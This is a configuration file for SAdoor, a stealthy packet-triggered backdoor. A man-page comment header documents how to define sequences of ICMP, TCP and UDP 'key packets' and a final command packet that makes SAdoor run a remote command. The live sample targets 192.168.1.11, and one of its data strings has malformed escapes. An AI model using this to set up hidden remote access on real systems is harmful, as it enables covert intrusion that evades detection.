#
# NAME
#        packets.txt - SAdoor packet configuration file
#
# DESCRIPTION
#        The  sadoor.pkts file contains the packets required by 
#        SAdoor to run a command or establish a connection  to  
#        a client.  Everything after a '#' is interpreted as a 
#        comment, and empty lines are ignored.
#
#        The file is expected to start with a  set  of  key-packets
#        followed  by  a  command-packet. The minimum configuration
#        consists of a single key-packet  followed  by  a  command-
#        packet.
#
# SYNTAX
#        Key packet syntax:
#        keypkt ['('replicate')'] '{'packet'}'
#
#        Command packet syntax:
#        cmdpkt '{'packet'}'
#
#        Where replicate is the number of times that the key packet
#        should be replicated.  This is useful if you plan to set a
#        number  of equal packets to appear in sequence, the packet
#        is then expected by sadoor to appear replicate+1 number of
#        times.
#
#        Packet syntax:
#        ip '{'daddr = ipv4addr';' [options] proto'{'[options]'}}'
#
#        As  we can see above, a destination address and a protocol
#        (udp, tcp or icmp) is required in all packets.
#
#        The optional  settings  is  set  as  keyword  =  value';'.
#        Numeric  values can be set using base 2,8,16 or 10 (0b, 0,
#        0x respectively as prefix).  The  optional  settings  with
#        their corresponding keyword and expected value follows.
#
#
#    OPTIONAL IP SETTINGS
#        saddr (dotted decimal)
#            Source IPv4 address.
#
#        tos (unsigned 8 bit)
#            Type of service. Typical values:
#
#            Telnet/Rlogin      0x10
#            FTP control        0x10
#            FTP data           0x08
#            TFTP               0x10
#            SMTP command       0x10
#            SMTP data          0x08
#            DNS UDP query      0x10
#            DNS TCP query      0x00
#            DNS zone transfer  0x08
#            ICMP error/query   0x00
#            IGP                0x04
#            SNMP               0x04
#            BOOTP              0x00
#            NNTP               0x02
#
#        id (unsigned 16 bit)
#            Identification number
#
#        ttl (unsigned 8 bit)
#            Time  to  live.   If  set, it is possible to configure
#            the client to add a value to the one required to  compen-
#            sate for reduction in transit.
#
#    OPTIONAL TCP SETTINGS
#        dport (unsigned 16 bit)
#            Destination port.
#
#        sport (unsigned 16 bit)
#            Source port.
#
#        flags (unsigned 6 bit or symbolic)
#            TCP control flags (URG ACK PSH RST SYN FIN).
#
#        seq (unsigned 32 bit)
#           Sequence number.
#
#        ack (unsigned 32 bit)
#            Acknowledge number.
#
#        data (see DATA section below)
#            Beginning of payload.
#
#    OPTIONAL UDP SETTINGS
#        dport (unsigned 16 bit)
#            Destination port.
#
#        sport (unsigned 16 bit)
#            Source port.
#
#        data (see DATA section below)
#            Beginning of payload.
#
#    OPTIONAL ICMP SETTINGS
#        type (unsigned 8 bit)
#            ICMP  type,  currently only 0 (echo reply) and 8 (echo
#            request) is supported.
#
#        code (unsigned 8 bit)
#            ICMP code, must be zero if set since type is  limited.
#
#        id (unsigned 16 bit)
#            Echo identity number.
#
#        seq (unsigned 16 bit)
#            Echo sequence number.
#
#        data (see DATA section below)
#            Beginning of payload.
#
#    DATA
#        Data  represents  the  beginning  of  the  payload  in the
#        received packet (with exception  for  the  command  packet
#        where  the  defined data also is an offset to the supplied
#        command).
#
#        Syntax:
#        data '{'data-string'}'
#
#        A data-string can't contain any whitespaces (or some  lan-
#        guage specific characters which will produce an error, eg.
#        write '\x7d' instead of '}').
#
#        The following escape sequences  is  supported  within  the
#        data-string:
#
#         \e - Escape character
#         \a - Bell character
#         \b - Backspace character
#         \f - Form-feed character
#         \n - New-line character
#         \r - Carriage return character
#         \t - Tab character
#         \v - Vertical tab character
#         \s - Space character
#         \\ - Backslash character
#         \x - Interpret the next two characters as hex
#
# EXAMPLES
#         # Three echo-request packets from any address
#         # The client can be configured to randomize or
#         # set a default value for source addresses
#         # on packets without a required source address).
#         keypkt(2)
#         {
#             ip {
#                 daddr = 192.168.1.1;
#                 icmp {
#                     type = 8;
#                     seq = 0;
#                 }
#             }
#         }
#
#         # HTTP GET request
#         keypkt {
#             ip {
#                 daddr = 192.168.1.1;
#                 tcp {
#                     dport = 80;
#                     flags = PSH ACK;
#                     data { GET\s/index.html\sHTTP/1.0\r\n }
#             }
#         }
#
#         # UDP packet
#         # Here is a TTL value of 255 required, forcing the
#         # packet to be generated on the same segment as the
#         # machine running SAdoor.
#         keypkt {
#             ip {
#                 daddr = 192.168.1.1;
#                 ttl = 255;
#                 udp {
#                     dport = 2049;
#                     sport = 23056;
#                     data { \x01\x02\x03\x04\x05\x06 }
#                 }
#             }
#         }
#
#         # TCP SYN scan?
#         # Since this packet has a TTL value set,
#         # the client needs to add it's number of hops
#         # away from the machine running SAdoor.
#         keypkt {
#             ip {
#                  daddr = 192.168.1.1;
#                  ttl = 39;
#                  tcp {
#                     dport = 80;
#                     flags = S;
#                 }
#             }
#         }
#
#         # Alot of requirements for this paket
#         keypkt {
#             ip {
#                daddr = 192.168.1.1;
#                saddr = 192.168.1.12;
#                id = 0xabcd;
#                ttl = 255;
#                tos = 0x10;
#                tcp {
#                    sport = 22309;
#                    dport = 23;
#                    flags = SYN ACK;
#                    seq = 0xc0ded;
#                    ack = 0xaaddccdd;
#                    data { thisisthebeginningofthepayload }
#                }
#            }
#         }
#
#         # The last packet is the command-packet.
#         # Since the beginning of the payload is
#         # set the (encrypted) command is expected right
#         # after the defined data.
#         cmdpkt
#         {
#             ip {
#                 daddr = 192.168.1.1;
#                 tcp {
#                     sport = 23456;
#                     seq = 0xaabbccdd;
#                     ack = 0xeeffaabb;
#                     data { command\soffset\sdata }
#                 }
#             }
#         }
#
# BUGS
#        Some  systems (like Solaris) alters the header on outgoing
#        packets.  AFAIK the only field affected in this release is
#        the  IP-ID  field, and you should avoid to set this if you
#        plan to use the client from  a  machine  running Solaris.
#        If  you  find  other limitations or bugs, please contact
#        the author.
#
#



# Echo request
keypkt {
  ip {
    daddr = 192.168.1.11;  
    icmp {
      type = 8;
      code = 0;
      id = 12345;
      seq = 0;
      data {
        \x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x38\x30\x61\x62\x63\x64
        \x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74
        \x75\x76\x77\x78\x79\x7a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a
        \x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a
      } 
    }
  }
}

# Echo request
keypkt {
    ip {
      daddr = 192.168.1.11;
      icmp {
         type = 8;
         code = 0;
         id = 12345;
         seq = 1;
         data {
           \x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x38\x30\x61\x62\x63\x64
           \x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74
           \x75\x76\x77\x78\x79\x7a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a
           \x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a
       }
     }
   }
}


# HTTP GET request
keypkt {
  ip {
    daddr = 192.168.1.11;
    tcp {
      dport = 80;
      flags = PSH ACK;
      data {
        GET\s/index.html\sHTTP/1.0\r\n}
    }
  }
}

# NFS data
keypkt {
  ip {
    daddr = 192.168.1.11;
    udp {
      dport = 2049;
      sport = 34345;
      data { \x00\x00\x00\x00\x00\x00 }
    }
  }
}

keypkt {
  ip {
    daddr = 192.168.1.11;
    tcp {
      seq = 0x5ad001;
      data { SAdoor\x20is\x20running\x20on\x
             your\xnetwork! }
    }
  }
}


# Command packet
cmdpkt {
  ip {
    daddr = 192.168.1.11;
    udp {
      dport = 62381;
      data {\x01\x01\x33\xff\x00\x12 }
    }
  }
}


